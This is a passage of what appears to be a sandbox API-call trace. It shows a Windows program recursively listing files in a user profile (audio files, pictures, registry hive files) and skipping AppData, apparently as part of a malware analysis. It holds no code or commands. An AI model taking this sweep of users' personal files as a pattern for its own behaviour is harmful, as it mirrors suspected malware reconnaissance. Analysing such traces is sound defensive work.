nFileSizeHigh=0x0, nFileSizeLow=0x3928, dwReserved0=0x10, dwReserved1=0x657690, cFileName="kDBYwX3doPBMqwfNV.m4a", cAlternateFileName="KDBYWX~1.M4A")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x10, dwReserved1=0x657690, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8c78, lpFindFileData=0x61dc20 | out: lpFindFileData=0x61dc20*(dwFileAttributes=0x16a0044, ftCreationTime.dwLowDateTime=0xc33f6, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1600045, nFileSizeHigh=0xc33f6, nFileSizeLow=0x2f, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="?a\x08", cAlternateFileName="h?aဓ\x03\x10")) returned 0 [0074.605] FindClose (in: hFindFile=0x6b8c78 | out: hFindFile=0x6b8c78) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x1560055, ftCreationTime.dwLowDateTime=0xc341b, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x1580056, nFileSizeHigh=0xc341b, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="V0\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.605] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c7070, ftCreationTime.dwHighDateTime=0x1d5d84f, ftLastAccessTime.dwLowDateTime=0x3e6d8870, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x3e6d8870, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0x18df5, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="tCz4fpeQ.wav", cAlternateFileName="")) returned 1 [0074.605] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 1 [0074.606] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1180066, ftCreationTime.dwLowDateTime=0xc3467, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x12a0067, nFileSizeHigh=0xc3467, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="v6\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.606] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.606] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0xa9281650, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 1 [0074.606] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x17c989e0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 1 [0074.606] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10e0077, ftCreationTime.dwLowDateTime=0xc3499, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1100078, nFileSizeHigh=0xc3499, nFileSizeLow=0x76a8f8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="xh\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.606] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.607] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0074.607] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Documents", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0074.607] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.608] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b2b8, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x869028b, nFileSizeHigh=0xb899f, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="NetHood", cAlternateFileName="")) returned 1 [0074.608] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.608] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NetHood", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0074.608] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.608] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b300, ftCreationTime.dwHighDateTime=0x50, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x869028b, nFileSizeHigh=0xb89c9, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="?haဓ\x03\x10")) returned 0xffffffff [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x61e84c, dwReserved1=0x657690, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x10, dwReserved1=0x657690, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x657690, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x10, dwReserved1=0x657690, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0074.608] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0074.609] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Pictures", cAlternateFileName="")) returned 1 [0074.609] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0074.609] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.609] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdadf5ec0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdadf5ec0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.609] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 1 [0074.609] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.609] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ggHHL.png", cAlternateFileName="")) returned 1 [0074.611] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="GX6xg0MP-Oop8LYh", cAlternateFileName="GX6XG0~1")) returned 1 [0074.611] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0074.611] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.612] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3bf3c9c0, ftCreationTime.dwHighDateTime=0x1d5dbd4, ftLastAccessTime.dwLowDateTime=0xe0779290, ftLastAccessTime.dwHighDateTime=0x1d5e5bd, ftLastWriteTime.dwLowDateTime=0xe0779290, ftLastWriteTime.dwHighDateTime=0x1d5e5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="E hluVFFklat", cAlternateFileName="EHLUVF~1")) returned 1 [0074.612] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.612] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5cf8b20, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0x8c938f90, ftLastAccessTime.dwHighDateTime=0x1d5d7de, ftLastWriteTime.dwLowDateTime=0x8c938f90, ftLastWriteTime.dwHighDateTime=0x1d5d7de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x0, dwReserved1=0x657690, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x10, dwReserved1=0x657690, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 1 [0074.612] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd6919b0, ftCreationTime.dwHighDateTime=0x1d5e0df, ftLastAccessTime.dwLowDateTime=0xe088b7f0, ftLastAccessTime.dwHighDateTime=0x1d5e08b, ftLastWriteTime.dwLowDateTime=0xe088b7f0, ftLastWriteTime.dwHighDateTime=0x1d5e08b, 